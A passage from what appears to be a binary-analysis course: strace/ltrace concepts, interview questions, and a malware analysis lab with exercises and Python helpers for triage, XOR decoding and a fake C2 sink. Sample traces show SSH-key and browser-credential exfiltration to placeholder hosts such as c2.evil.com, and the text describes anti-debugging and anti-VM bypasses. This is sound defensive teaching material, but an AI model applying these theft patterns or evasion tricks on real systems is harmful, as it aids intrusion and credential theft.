    • Why do programs use mmap() instead of just allocating with malloc()?
    • How can you tell from syscall traces whether a program is leaking memory?

    Book References:

    • "Computer Systems: A Programmer's Perspective" - Chapter 9: Virtual Memory
    • "The Linux Programming Interface" - Chapter 6: Processes (memory layout)
    • "Practical Binary Analysis" by Dennis Andriesse - Chapter 5.2: Loading and Dynamic Linking
  3. Library Calls vs. System Calls
    • Library calls (ltrace) are user-space wrappers around syscalls
    • Because stdio buffers data, several small fread() calls may be served by a single read() syscall, while one large fread() may need several
    • Understanding the libc abstraction layer

    Guiding Questions:

    • Why does printf("hello") not immediately trigger a write() syscall?
    • How does libc's buffering affect what you see in strace vs. ltrace?
    • When would you use ltrace instead of strace (and vice versa)?

    Book References:

    • "The Linux Programming Interface" - Chapter 13: File I/O Buffering
    • "Computer Systems: A Programmer's Perspective" - Chapter 10: System-Level I/O
  4. File Descriptors and File Operations
    • Understanding fd numbers: 0=stdin, 1=stdout, 2=stderr, 3+=open files
    • How openat(), read(), write(), close() work together
    • Interpreting flags like O_RDONLY, O_WRONLY, O_CREAT

    Guiding Questions:

    • What does openat(AT_FDCWD, "/etc/passwd", O_RDONLY) = 3 tell you?
    • How can you track which fd corresponds to which file in a long trace?
    • What's suspicious about a program opening /dev/urandom or /etc/shadow?

    Book References:

    • "The Linux Programming Interface" - Chapter 4: File I/O: The Universal I/O Model
    • "The Linux Programming Interface" - Chapter 18: Directories and Links
  5. Process Lifecycle (fork/exec/wait)
    • How processes create children with fork(), replace themselves with execve()
    • Following child processes with strace -f
    • Understanding return values: fork() returns twice (parent gets child PID, child gets 0)

    Guiding Questions:

    • Why does fork() return different values in parent and child?
    • What happens to file descriptors when a process calls execve()?
    • How would you trace a shell script that spawns multiple child processes?

    Book References:

    • "The Linux Programming Interface" - Chapter 24: Process Creation
    • "The Linux Programming Interface" - Chapter 27: Program Execution
    • "Computer Systems: A Programmer's Perspective" - Chapter 8.4: Process Control
  6. Network Socket API
    • Understanding socket(), connect(), bind(), listen(), accept(), send(), recv()
    • Reading sockaddr structures to extract IP addresses and ports
    • Identifying client vs. server behavior from syscall patterns

    Guiding Questions:

    • What syscall sequence indicates a program is acting as a server?
    • How do you extract the destination IP and port from a connect() call?
    • What's the difference between AF_INET (IPv4) and AF_INET6 (IPv6)?

    Book References:

    • "The Linux Programming Interface" - Chapter 56-61: Sockets and Network Programming
    • "Computer Systems: A Programmer's Perspective" - Chapter 11: Network Programming
  7. Signal Handling
    • How programs respond to events (Ctrl+C sends SIGINT, segfault triggers SIGSEGV)
    • Seeing rt_sigaction() and rt_sigprocmask() in traces
    • Understanding signal delivery and handler installation

    Guiding Questions:

    • What does it mean when a program installs a handler for SIGSEGV?
    • Why might malware install signal handlers to detect debugging?
    • How can you tell if a program is ignoring SIGTERM?

    Book References:

    • "The Linux Programming Interface" - Chapter 20-22: Signals
    • "Computer Systems: A Programmer's Perspective" - Chapter 8.5: Signals
  8. Dynamic Linking and Shared Libraries
    • How programs load .so files at runtime
    • Understanding LD_PRELOAD and library injection
    • Seeing dlopen(), dlsym() for runtime loading

    Guiding Questions:

    • What's happening when you see multiple openat() calls to .so files?
    • How could an attacker use LD_PRELOAD maliciously?
    • Why do some programs use dlopen() instead of linking at compile time?

    Book References:

    • "Computer Systems: A Programmer's Perspective" - Chapter 7: Linking
    • "Practical Binary Analysis" - Chapter 5: Loading and Dynamic Linking
    • "The Linux Programming Interface" - Chapter 41-42: Shared Libraries
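
One of the concepts above, keeping track of which file descriptor refers to which file, is mechanical enough to script. The sketch below is a simplified model: it follows only openat(), socket(), and close(), and the sample trace is invented. It shows why fd numbers alone are ambiguous, since the kernel reuses the lowest free number.

```python
import re

OPEN_RE = re.compile(r'^openat\(\w+, "([^"]*)".*\)\s*=\s*(\d+)')
SOCKET_RE = re.compile(r'^socket\((.*)\)\s*=\s*(\d+)')
CLOSE_RE = re.compile(r'^close\((\d+)\)\s*=\s*0')
IO_RE = re.compile(r'^(read|write)\((\d+),')


def annotate(lines):
    """Return (operation, target) pairs for every read()/write() in the trace."""
    fds = {0: "stdin", 1: "stdout", 2: "stderr"}
    events = []
    for raw in lines:
        line = raw.strip()
        opened = OPEN_RE.match(line)
        sock = SOCKET_RE.match(line)
        closed = CLOSE_RE.match(line)
        io = IO_RE.match(line)
        if opened:
            fds[int(opened.group(2))] = opened.group(1)
        elif sock:
            fds[int(sock.group(2))] = f"socket({sock.group(1)})"
        elif closed:
            fds.pop(int(closed.group(1)), None)
        elif io:
            fd = int(io.group(2))
            events.append((io.group(1), fds.get(fd, f"fd {fd} (unknown)")))
    return events


# Invented trace: fd 3 is first a file, then a socket.
TRACE = [
    r'openat(AT_FDCWD, "/etc/hostname", O_RDONLY) = 3',
    r'read(3, "box\n", 4096) = 4',
    r'close(3) = 0',
    r'socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3',
    r'write(3, "box\n", 4) = 4',
]

events = annotate(TRACE)
for op, target in events:
    print(f"{op} -> {target}")
```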

Questions to Guide Your Design

  1. How can you automatically filter out "boring" syscalls (like mmap() for library loading) to focus on interesting behavior?
    • Consider writing a Python script that parses strace output and highlights file/network operations
    • What heuristics distinguish initialization syscalls from runtime behavior?
  2. How would you detect anti-debugging or anti-tracing techniques in a program?
    • Programs can check if they're being traced using ptrace(PTRACE_TRACEME)
    • What syscall patterns indicate a program is checking for analysis tools?
  3. How can you reconstruct a program's command-line parsing logic from ltrace output alone?
    • Watch for strcmp(), strncmp(), getopt() calls
    • Can you build a decision tree of program behavior based on arguments?
  4. What's the difference between tracing a statically-linked binary vs. a dynamically-linked binary?
    • Static binaries embed their own copy of libc, so ltrace has no dynamic calls to hook; dynamic binaries reach libc through the PLT
    • How does this affect what you see in strace vs. ltrace?
  5. How would you trace a multi-threaded program with strace?
    • Use strace -f to follow threads created by clone()
    • How do you distinguish thread creation from process creation in the output?
  6. Can you identify a program's cryptographic operations from syscall traces?
    • Look for reads from /dev/urandom (entropy source)
    • Large writes to network sockets might indicate encrypted communication
  7. How would you use strace to diagnose why a program is slow or hanging?
    • Look for blocking syscalls: read() on network sockets, wait() on child processes
    • Use strace -T to show time spent in each syscall
  8. How can you determine if a binary is packed or obfuscated by examining its syscalls?
    • Self-modifying code might use mprotect() to change memory permissions
    • Packed binaries often unpack themselves in memory before executing

Thinking Exercise

Exercise 1: Manual Syscall Trace Analysis

Before running any tools, examine this strace output from an unknown binary:

execve("./mystery", ["./mystery"], 0x7ffc...) = 0
openat(AT_FDCWD, "/home/user/.ssh/id_rsa", O_RDONLY) = 3
read(3, "-----BEGIN RSA PRIVATE KEY-----\n"..., 4096) = 1679
close(3) = 0
socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(443),
        sin_addr=inet_addr("203.0.113.45")}, 16) = 0
write(3, "-----BEGIN RSA PRIVATE KEY-----\n"..., 1679) = 1679
close(3) = 0
unlink("/home/user/.ssh/id_rsa") = 0

Questions to answer:

  1. What is this program doing? (Be specific about each step)
  2. What type of malware behavior does this exhibit?
  3. What Indicators of Compromise (IOCs) can you extract?
  4. How would you write a YARA rule to detect similar behavior?
  5. What syscall would you set a breakpoint on if debugging this?

Exercise 2: ltrace Password Extraction

Given this ltrace output from a crackme:

__libc_start_main(...)
puts("Enter password: ")
fgets("my_guess\n", 100, 0x7f...)
strlen("my_guess\n") = 9
strcmp("my_guess", "sup3r_s3cr3t") = -1
puts("Wrong password!")

Tasks:

  1. Extract the correct password (even though we guessed wrong)
  2. Explain why ltrace is more useful than strace for this crackme
  3. What would strace show instead? (Describe the syscalls)
  4. How could the developer prevent this ltrace attack?

Exercise 3: Network Protocol Reconstruction

Analyze this strace excerpt and reconstruct the network protocol:

socket(AF_INET, SOCK_STREAM, 0) = 3
connect(3, {sin_addr=inet_addr("10.0.0.5"), sin_port=htons(9999)}, 16) = 0
write(3, "HELLO\n", 6) = 6
read(3, "OK\n", 4096) = 3
write(3, "GET /data\n", 10) = 10
read(3, "DATA:12345\n", 4096) = 11
write(3, "BYE\n", 4) = 4
close(3) = 0

Questions:

  1. Is this a text-based or binary protocol?
  2. What's the message flow? (Draw a sequence diagram)
  3. How would you fuzz this protocol?
  4. What's missing from this trace that would help with analysis?

The Interview Questions Theyโ€™ll Ask

  1. โ€œYouโ€™re analyzing a suspicious binary. It produces no output, but you suspect itโ€™s exfiltrating data. How would you use strace to confirm this?โ€
    • Expected Answer: Use strace -e trace=network to trace network syscalls. Look for socket(), connect(), send(), or write() to network fds. Check destination IPs. Use strace -s 1000 to see full data buffers. Alternatively, combine with Wireshark for full packet capture.
  2. “Explain the difference between strace and ltrace. When would you use each?”
    • Expected Answer: strace traces system calls (kernel boundary), ltrace traces library calls (user-space functions). Use strace for file/network I/O and process management. Use ltrace for string operations (strcmp), crypto functions (MD5), and library-level logic. Sometimes you need both: strace shows what happens, ltrace shows how the program logic works.
  3. “A program is reading from /dev/urandom. What does this tell you, and what should you investigate next?”
    • Expected Answer: It’s generating random numbers, likely for cryptography or nonce generation. Check how many bytes it reads. Look for subsequent crypto operations (OpenSSL functions in ltrace, or network writes that might be encrypted data). Could be legitimate (TLS) or malicious (ransomware generating encryption keys).
  4. “How does strace work under the hood? What syscall does strace itself use?”
    • Expected Answer: strace uses the ptrace() syscall to attach to a process and intercept its syscalls. When the traced process makes a syscall, the kernel stops it and notifies strace. This is the same mechanism debuggers use, which is why anti-debugging malware often checks for ptrace() or looks for parent processes named “strace”.
  5. “You see hundreds of mmap() and mprotect() calls in a trace. What might this indicate?”
    • Expected Answer: Could be normal (loading shared libraries, allocating memory). Or it could indicate packing/obfuscation: malware unpacking itself, self-modifying code, or JIT compilation. Check whether mprotect() is making memory executable (PROT_EXEC). Packed malware often mmap()s space, writes unpacked code, then mprotect()s it to RWX.
  6. “How would you trace a program that uses fork() to create multiple child processes?”
    • Expected Answer: Use strace -f (follow forks). Output can be confusing with interleaved processes. Use -ff -o trace.log to write each process to a separate file (trace.log.PID). Then analyze each child’s behavior independently. Note that glibc implements fork() on top of clone(), so distinguish threads from processes by the clone() flags (CLONE_THREAD, CLONE_VM) rather than by the syscall name.
  7. “A program calls unlink() on its own executable. What’s likely happening?”
    • Expected Answer: It’s deleting itself, which is common in malware that wants to hide its tracks. On Linux, a running executable can be unlinked: the directory entry disappears, but the data stays on disk until the last reference (open fd or memory mapping) is released. The program continues running from memory. This is an anti-forensics technique. While the process is alive you can often recover the binary from /proc/<pid>/exe; otherwise you’d need to dump the process memory.
  8. “You trace a crackme and see strcmp("my_input", "secretpass") = -1. Is this always the password?”
    • Expected Answer: Usually yes, but not always! Some crackmes use tricks: comparing hashes instead of plaintext, doing multiple checks (all must pass), or adding timing-based checks. Note that memcmp() is still a library call, so ltrace shows it too, although raw binary buffers are harder to read. To avoid ltrace entirely, a crackme has to implement the comparison inline or in custom assembly so that no library call is made.
  9. “How can a program detect that it’s being traced by strace, and how would you bypass this detection?”
    • Expected Answer: Programs can call ptrace(PTRACE_TRACEME), which fails if the process is already traced (strace uses ptrace). They can check /proc/self/status for “TracerPid”. They can use timing checks (strace is slow). Bypasses: Use kernel modules that hook syscalls without ptrace. Use emulation (QEMU user-mode). Patch the binary to remove checks. Use LD_PRELOAD to fake ptrace return values.
  10. “You need to analyze a binary but it’s statically linked. How does this affect your strace/ltrace strategy?”
    • Expected Answer: ltrace is useless because there are no dynamic library calls to intercept. strace still works (syscalls are unavoidable). You’ll see raw syscalls instead of nice library wrappers. For string operations, you’ll need to disassemble or use dynamic instrumentation (Frida, DynamoRIO) to hook internal functions.
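
The TracerPid check from question 9 is simple enough to sketch. The following is a minimal illustration, not how any particular sample does it; the helper names `tracer_pid` and `is_traced` are made up for this example, and the check only makes sense on Linux where /proc is mounted.

```python
from pathlib import Path
from typing import Optional


def tracer_pid(status_text: str) -> Optional[int]:
    """Return the TracerPid value from /proc/<pid>/status text, or None if absent."""
    for line in status_text.splitlines():
        if line.startswith("TracerPid:"):
            return int(line.split(":", 1)[1].strip())
    return None


def is_traced() -> bool:
    """True if another process (strace, gdb, ...) is ptrace-attached to us."""
    status = Path("/proc/self/status")
    if not status.exists():          # not Linux, or /proc is not mounted
        return False
    return bool(tracer_pid(status.read_text()))   # 0 means "no tracer"


if __name__ == "__main__":
    print("traced" if is_traced() else "not traced")
```

Running the script once directly and once under `strace -f` should show the two outcomes. Knowing what the check looks like also tells you what to patch or fake when bypassing it.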

Books That Will Help

| Topic | Book | Chapter/Section | Why It Matters |
|---|---|---|---|
| System Call Fundamentals | “The Linux Programming Interface” by Michael Kerrisk | Ch. 3: System Programming Concepts | Complete reference for every syscall you’ll see in traces |
| System Call Mechanics | “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron | Ch. 8.1: Exceptions; Ch. 8.4: Process Control | Understand how syscalls transition from user to kernel mode |
| File I/O Operations | “The Linux Programming Interface” by Michael Kerrisk | Ch. 4-5: File I/O | Decode all file-related syscalls (open, read, write, ioctl) |
| Process Management | “The Linux Programming Interface” by Michael Kerrisk | Ch. 24-27: Process Creation, Monitoring, Execution | Understand fork(), exec(), wait() patterns in traces |
| Network Programming | “The Linux Programming Interface” by Michael Kerrisk | Ch. 56-61: Sockets | Interpret socket(), connect(), bind(), listen(), accept() |
| Network Internals | “Computer Systems: A Programmer’s Perspective” | Ch. 11: Network Programming | Client-server architecture, protocol design |
| Signals | “The Linux Programming Interface” by Michael Kerrisk | Ch. 20-22: Signals | Understand signal handlers in malware |
| Dynamic Linking | “Computer Systems: A Programmer’s Perspective” | Ch. 7: Linking | Why you see library loads in strace |
| Binary Loading | “Practical Binary Analysis” by Dennis Andriesse | Ch. 5: Loading and Dynamic Linking | How programs load and what syscalls this generates |
| Low-Level System Calls | “Low-Level Programming” by Igor Zhirkov | Ch. 2: Assembly Language | Direct syscall invocation via syscall instruction |
| Ptrace Internals | “The Linux Programming Interface” by Michael Kerrisk | Ch. 53: Process Credentials (includes ptrace) | How strace itself works |
| Anti-Debugging Techniques | “Practical Malware Analysis” by Sikorski & Honig | Ch. 15: Anti-Disassembly; Ch. 16: Anti-Debugging | Detect and bypass tracing countermeasures |
| Behavioral Analysis Methodology | “Practical Malware Analysis” by Sikorski & Honig | Ch. 3: Basic Dynamic Analysis | Professional workflow for using dynamic analysis tools |
| Assembly & Syscalls | “Hacking: The Art of Exploitation” by Jon Erickson | Ch. 0x200: Programming (syscalls section) | Raw syscall invocation in assembly |

Project 10: Malware Analysis Lab

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Assembly analysis, Python
  • Alternative Programming Languages: PowerShell (Windows malware)
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 3. The “Service & Support” Model
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Malware Analysis / Threat Intelligence
  • Software or Tool: REMnux, FLARE-VM, Ghidra, x64dbg
  • Main Book: “Practical Malware Analysis” by Sikorski & Honig

What you’ll build: A complete malware analysis workflow, from safe environment setup to behavioral analysis, static analysis, and report writing.

Why it teaches binary analysis: Malware analysis is one of the most practical applications of binary analysis. It combines all skills: file formats, assembly, debugging, and behavioral analysis.

Core challenges you’ll face:

  • Safe environment → maps to VMs, network isolation
  • Behavioral analysis → maps to what does it do when run?
  • Static analysis → maps to understanding without running
  • Anti-analysis bypass → maps to detecting/evading protections

Resources for key challenges:

Key Concepts:

  • Safe Environment Setup: “Practical Malware Analysis” Ch. 2
  • Behavioral Analysis: “Practical Malware Analysis” Ch. 3
  • Anti-Debugging Techniques: OpenRCE Database

Difficulty: Advanced
Time estimate: 4-6 weeks
Prerequisites: Projects 1-9, strong Windows/Linux knowledge

Real world outcome:

# Malware Analysis Report: suspicious.exe

## Executive Summary
The sample is a credential stealer that exfiltrates browser passwords
to a C2 server at 192.168.1.100:443.

## Static Analysis
- File Type: PE32+ executable (x64)
- Compiler: MSVC 2019
- Imports: WinInet (HTTP), Crypt32 (decryption), Advapi32 (registry)
- Packed: UPX 3.96 (unpacked for analysis)
- Strings:
  - "Chrome\\User Data\\Default\\Login Data"
  - "Mozilla\\Firefox\\Profiles"
  - "https://c2.evil.com/upload"

## Behavioral Analysis
1. Creates mutex "Global\\{GUID}" (prevents multiple instances)
2. Achieves persistence via Run key
3. Reads browser credential databases
4. Encrypts data with XOR key 0x37
5. Exfiltrates via HTTPS POST

## IOCs
- Mutex: Global\\{12345678-1234-...}
- C2: 192.168.1.100:443
- User-Agent: "Mozilla/5.0 Custom"
- File: %APPDATA%\\svchost.exe

## YARA Rule
rule credential_stealer {
    strings:
        $s1 = "Login Data" ascii
        $s2 = "cookies.sqlite" ascii
        $c2 = "192.168.1.100" ascii
    condition:
        2 of them
}

Implementation Hints:

Analysis workflow:

  1. Triage: File type, hashes, VirusTotal check
  2. Environment Setup: Isolated VM with snapshots
  3. Behavioral Analysis:
    • Process Monitor (Windows) / strace (Linux)
    • Network capture (Wireshark, fakenet-ng)
    • Registry changes, file system changes
  4. Static Analysis:
    • Strings, imports, exports
    • Unpack if packed
    • Disassemble/decompile key functions
  5. Dynamic Analysis:
    • Debug with x64dbg/GDB
    • Set breakpoints on interesting APIs
    • Dump decrypted data
  6. Report Writing: Document findings with IOCs
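
The triage step in the workflow above can be sketched with the standard library alone. This is a minimal illustration under stated assumptions: `triage` and `shannon_entropy` are names chosen for this example, the function works on bytes already read from disk inside the lab VM, and the VirusTotal lookup is left out because it needs an API key.

```python
import hashlib
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for constant data, 8.0 for uniform)."""
    if not data:
        return 0.0
    total = len(data)
    return sum((n / total) * math.log2(total / n) for n in Counter(data).values())


def triage(data: bytes) -> dict:
    """Collect the basic identifiers gathered in step 1 of the workflow."""
    return {
        "size": len(data),
        "md5": hashlib.md5(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "entropy": round(shannon_entropy(data), 3),
        "is_pe": data[:2] == b"MZ",          # DOS header magic
        "is_elf": data[:4] == b"\x7fELF",    # ELF magic
    }


if __name__ == "__main__":
    sample = b"MZ" + bytes(range(256)) * 4   # stand-in bytes, not a real sample
    for key, value in triage(sample).items():
        print(f"{key}: {value}")
```

Entropy close to 8 bits per byte across most of a file is a common hint that it is packed or encrypted, which tells you to plan for unpacking before static analysis.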

Anti-analysis techniques to watch for:

  • IsDebuggerPresent() checks
  • Timing checks (RDTSC)
  • VM detection (CPUID, registry checks)
  • Anti-disassembly tricks

Learning milestones:

  1. Set up safe lab → Isolated analysis environment
  2. Behavioral analysis → Understand without disassembly
  3. Static analysis → Reverse engineer core functionality
  4. Write reports → Document findings professionally

The Core Question You’re Answering

“How do we safely dissect malicious software to understand its behavior, identify its capabilities, and develop countermeasures, all without becoming infected ourselves?”

This project tackles the complete malware analysis workflow from containment to comprehension. You’ll learn to think like both an attacker (to understand intent) and a defender (to build protections), mastering the delicate balance between running dangerous code and staying safe.

Concepts You Must Understand First

  1. Virtualization and Sandboxing
    • How virtual machines isolate malware from the host system
    • Understanding hypervisors (VirtualBox, VMware, KVM) and their security boundaries
    • Snapshotting and rollback to maintain clean analysis environments

    Guiding Questions:

    • What’s the difference between a VM, a container, and a sandbox?
    • Can malware escape from a VM? What are VM escape vulnerabilities?
    • Why do you need network isolation in addition to VM isolation?

    Book References:

    • “Practical Malware Analysis” by Sikorski & Honig - Chapter 2: Malware Analysis in Virtual Machines
    • “Practical Binary Analysis” by Dennis Andriesse - Chapter 9: Binary Instrumentation
  2. Portable Executable (PE) File Format
    • Structure of Windows executables: DOS header, PE header, sections, imports, exports
    • Understanding Import Address Table (IAT) and how malware uses Windows APIs
    • Recognizing packed binaries by entropy analysis and section characteristics

    Guiding Questions:

    • What does it mean when a PE file has a high entropy .text section?
    • How do you identify if a binary is packed? (Hint: look at imports and section names)
    • What’s the difference between static imports and dynamic loading with LoadLibrary/GetProcAddress?

    Book References:

    • “Practical Malware Analysis” - Chapter 1: Basic Static Techniques
    • “Practical Binary Analysis” - Chapter 2: The ELF Format and Chapter 3: The PE Format
    • “Windows Internals” by Russinovich & Solomon - Part 1, Chapter 3: System Mechanisms (PE format)
  3. Windows API and System Mechanisms
    • Critical APIs malware uses: CreateProcess, WriteProcessMemory, SetWindowsHookEx
    • Registry manipulation for persistence (Run keys, services)
    • Process injection techniques (DLL injection, process hollowing, APC injection)

    Guiding Questions:

    • What API sequence indicates DLL injection into another process?
    • How does malware achieve persistence without being obvious?
    • What’s the difference between CreateRemoteThread and QueueUserAPC for code injection?

    Book References:

    • “Practical Malware Analysis” - Chapter 12: Covert Malware Launching
    • “Windows Internals” - Part 1, Chapter 3: System Mechanisms
    • “The Art of Memory Forensics” by Ligh et al. - Chapter 11: Malware Detection
  4. Anti-Analysis Techniques
    • Anti-debugging: IsDebuggerPresent, CheckRemoteDebuggerPresent, timing checks (RDTSC)
    • Anti-VM: CPUID checks, registry keys (HKLM\HARDWARE\Description), driver detection
    • Packing and obfuscation: UPX, custom packers, polymorphic code

    Guiding Questions:

    • How can you defeat IsDebuggerPresent() checks?
    • What registry keys do VMs create that malware looks for?
    • What’s the difference between packing (compression) and obfuscation (code transformation)?

    Book References:

    • “Practical Malware Analysis” - Chapter 15: Anti-Disassembly
    • “Practical Malware Analysis” - Chapter 16: Anti-Debugging
    • “Practical Malware Analysis” - Chapter 17: Anti-Virtual Machine Techniques
    • “Practical Malware Analysis” - Chapter 18: Packers and Unpacking
  5. Network Protocols and C2 Communication
    • HTTP/HTTPS C2 channels and beaconing patterns
    • DNS tunneling for data exfiltration
    • Understanding bot commands and malware control protocols

    Guiding Questions:

    • How do you identify C2 traffic in a network capture?
    • What makes DNS tunneling attractive for attackers?
    • How would you decode a base64-encoded HTTP POST that’s exfiltrating data?

    Book References:

    • “Practical Malware Analysis” - Chapter 14: Malware-Focused Network Signatures
    • “Computer Systems: A Programmer’s Perspective” - Chapter 11: Network Programming
    • “The Linux Programming Interface” - Chapter 59: Sockets: Internet Domains
  6. Behavioral Indicators of Compromise (IOCs)
    • File-based IOCs: hashes (MD5, SHA256), file paths, mutex names
    • Network IOCs: IP addresses, domains, User-Agents, URL patterns
    • Registry IOCs: persistence keys, configuration storage

    Guiding Questions:

    • Why is SHA256 better than MD5 for malware identification?
    • What makes a good YARA rule vs. a brittle one?
    • How can attackers evade file-hash-based detection?

    Book References:

    • “Practical Malware Analysis” - Chapter 3: Basic Dynamic Analysis
    • “The Art of Memory Forensics” - Chapter 11: Malware Detection
  7. Disassembly and Decompilation
    • Reading x86/x64 assembly: common patterns (function prologues, loops, conditionals)
    • Using Ghidra’s decompiler to understand code logic
    • Identifying crypto operations, string obfuscation, and anti-analysis tricks in assembly

    Guiding Questions:

    • What assembly pattern indicates a string decryption routine?
    • How do you identify the “main” function in a stripped binary?
    • When is assembly analysis more reliable than decompiled code?

    Book References:

    • “Practical Malware Analysis” - Chapter 4: A Crash Course in x86 Disassembly
    • “Practical Binary Analysis” - Chapter 6: Disassembly and Binary Analysis Fundamentals
    • “Low-Level Programming” by Igor Zhirkov - Chapter 3-5: Assembly Programming
  8. Static vs. Dynamic Analysis Trade-offs
    • When static analysis fails (heavy obfuscation, runtime code generation)
    • When dynamic analysis fails (time bombs, environment checks, anti-VM)
    • Hybrid approaches: concolic execution, taint analysis

    Guiding Questions:

    • If malware won’t run in your VM, what static analysis can you do?
    • How do you analyze malware with a time-delayed payload?
    • What’s the advantage of symbolic execution over pure dynamic analysis?

    Book References:

    • “Practical Malware Analysis” - Introduction: Basic Analysis vs. Advanced Analysis
    • “Practical Binary Analysis” - Chapter 9: Binary Instrumentation
  9. Cryptography in Malware
    • Identifying crypto operations: XOR loops, AES constants, hash functions
    • Understanding why malware encrypts strings and configuration
    • Extracting encryption keys from memory dumps

    Guiding Questions:

    • What assembly pattern indicates a simple XOR decryption loop?
    • How do you find AES constants (S-boxes, round constants) in a binary?
    • Why do ransomware authors sometimes make crypto mistakes that allow file recovery?

    Book References:

    • “Practical Malware Analysis” - Chapter 13: Data Encoding (includes crypto)
    • “Hacking: The Art of Exploitation” by Jon Erickson - Chapter 0x700: Cryptology
  10. Memory Forensics
    • Dumping process memory from running malware
    • Analyzing heaps for decrypted strings and configurations
    • Extracting injected code from remote processes

    Guiding Questions:

    • How do you dump a process’s memory without killing it?
    • What tool helps you find injected DLLs in a process?
    • How can you extract the unpacked version of packed malware from memory?

    Book References:

    • “The Art of Memory Forensics” by Ligh et al. - Chapter 11: Malware Detection
    • “Practical Malware Analysis” - Chapter 9: OllyDbg (memory dumping)
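
For the single-byte XOR encoding mentioned under concept 9, key recovery with a known plaintext fragment fits in a few lines. This is a sketch under stated assumptions: the function names are illustrative, the encoded blob is built inside the example from a made-up config string, and real samples often use multi-byte or rolling keys that this does not handle.

```python
from typing import Optional


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (the operation is its own inverse)."""
    return bytes(b ^ key for b in data)


def recover_single_byte_key(blob: bytes, known_plaintext: bytes) -> Optional[int]:
    """Try all 256 keys; return the first whose output contains the known fragment."""
    for key in range(256):
        if known_plaintext in xor_bytes(blob, key):
            return key
    return None


if __name__ == "__main__":
    # Illustrative blob: a made-up config string encoded with key 0x37.
    blob = xor_bytes(b"url=http://example.invalid/gate.php", 0x37)
    key = recover_single_byte_key(blob, b"http")
    print(hex(key), xor_bytes(blob, key))
```

Fragments such as "http", "MZ", or "This program" make good known plaintext because they appear in most configs and embedded payloads.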

Questions to Guide Your Design

  1. How would you design a safe lab that prevents malware from detecting that it is being analyzed?
    • Consider anti-VM evasion: modify VM artifacts, use bare metal, change MAC addresses
    • Network design: INetSim for fake internet, isolated VLAN, no real network access
    • What makes an analysis environment “invisible” to malware?
  2. What’s your workflow for triaging 100 malware samples to find the most interesting ones?
    • Automate with YARA rules, static signatures, VirusTotal queries
    • Quick behavioral checks: does it crash immediately? Does it beacon to a C2?
    • How do you prioritize novel malware over known families?
  3. How would you bypass an anti-debugging check that uses RDTSC timing?
    • Patch the check, hook RDTSC, use hardware breakpoints instead of software
    • Understand the trade-offs: patching changes the binary, hooking adds overhead
  4. How can you extract the configuration from a packed malware sample?
    • Dynamic: let it unpack in memory, then dump
    • Static: find the unpacking stub, manually unpack, or use automated unpackers
    • What if the malware uses multi-stage unpacking?
  5. What’s the difference between analyzing Windows malware vs. Linux malware?
    • Tools differ: x64dbg/IDA vs. GDB/radare2
    • File formats: PE vs. ELF
    • APIs: Windows API vs. syscalls
    • But fundamental analysis principles remain the same
  6. How would you write a YARA rule that detects a malware family without generating false positives?
    • Use unique strings, not common ones
    • Combine multiple weak indicators
    • Test against known benign software
  7. What indicators tell you if malware is polymorphic or metamorphic?
    • Hash changes between samples of same family
    • Code structure changes (metamorphic) vs. just encryption key changes (polymorphic)
    • How does this affect detection?
  8. How do you analyze malware that requires internet connectivity to fully execute?
    • Fake C2 server with INetSim or custom Python scripts
    • MITM proxy to intercept/modify traffic
    • What if the malware validates C2 certificates?
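
The "custom Python scripts" option from question 8 can be as small as an HTTP sink that accepts any POST and records it. The sketch below is one possible shape, assuming the sample speaks plain HTTP and that lab DNS or routing already points its C2 hostname at the analysis host; `SinkHandler`, `start_sink`, and `captured` are names invented for this example. It binds to 127.0.0.1 and should only ever run inside the isolated lab network.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

captured = []  # one (path, headers, body) tuple per POST received


class SinkHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length)
        captured.append((self.path, dict(self.headers), body))
        # Always answer 200 so the sample believes the upload succeeded.
        self.send_response(200)
        self.send_header("Content-Length", "2")
        self.end_headers()
        self.wfile.write(b"OK")

    def log_message(self, fmt, *args):
        pass  # keep stderr quiet; everything of interest is in `captured`


def start_sink(host="127.0.0.1", port=0):
    """Start the sink on a background thread; port 0 lets the OS pick a free port."""
    server = HTTPServer((host, port), SinkHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


if __name__ == "__main__":
    server = start_sink()
    # Simulate one beacon so the capture path can be checked without a sample.
    conn = http.client.HTTPConnection("127.0.0.1", server.server_port, timeout=5)
    conn.request("POST", "/gate.php", body=b"id=PC-12345")
    conn.getresponse().read()
    print(captured[0][0], captured[0][2])
    server.shutdown()
```

A sink like this answers the first question about a sample (what does it send?) but not the follow-up in the list above: if the malware validates C2 certificates, you need TLS interception or patching on top.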

Thinking Exercise

Exercise 1: Behavioral Analysis from Process Monitor

Examine this Process Monitor (procmon) output from an unknown executable:

CreateFile: C:\Users\victim\AppData\Roaming\svchost.exe (SUCCESS)
WriteFile: C:\Users\victim\AppData\Roaming\svchost.exe (SUCCESS, 45KB)
SetValueKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SecurityUpdate = "C:\Users\victim\AppData\Roaming\svchost.exe" (SUCCESS)
CreateFile: C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default\Login Data (SUCCESS)
ReadFile: Login Data (SUCCESS, 256KB)
Socket: Connect to 203.0.113.50:443 (SUCCESS)
WriteFile: Socket (SUCCESS, 256KB)

Questions to answer:

  1. What persistence mechanism is being used?
  2. What data is being exfiltrated?
  3. What type of malware is this likely to be?
  4. What IOCs can you extract?
  5. What should you investigate next in static analysis?

Exercise 2: Static Analysis - Identifying Packed Malware

You run strings on suspicious.exe and get:

UPX0
UPX1
$Info: This file is packed with the UPX executable packer http://upx.sf.net $
kernel32.dll
VirtualProtect
GetProcAddress

You check the PE sections:

Section Name: UPX0 (Virtual Size: 0x5000, Raw Size: 0)
Section Name: UPX1 (Virtual Size: 0x8000, Raw Size: 0x7800)
Section Name: .rsrc (Virtual Size: 0x1000, Raw Size: 0x1000)

Tasks:

  1. How do you know this binary is packed?
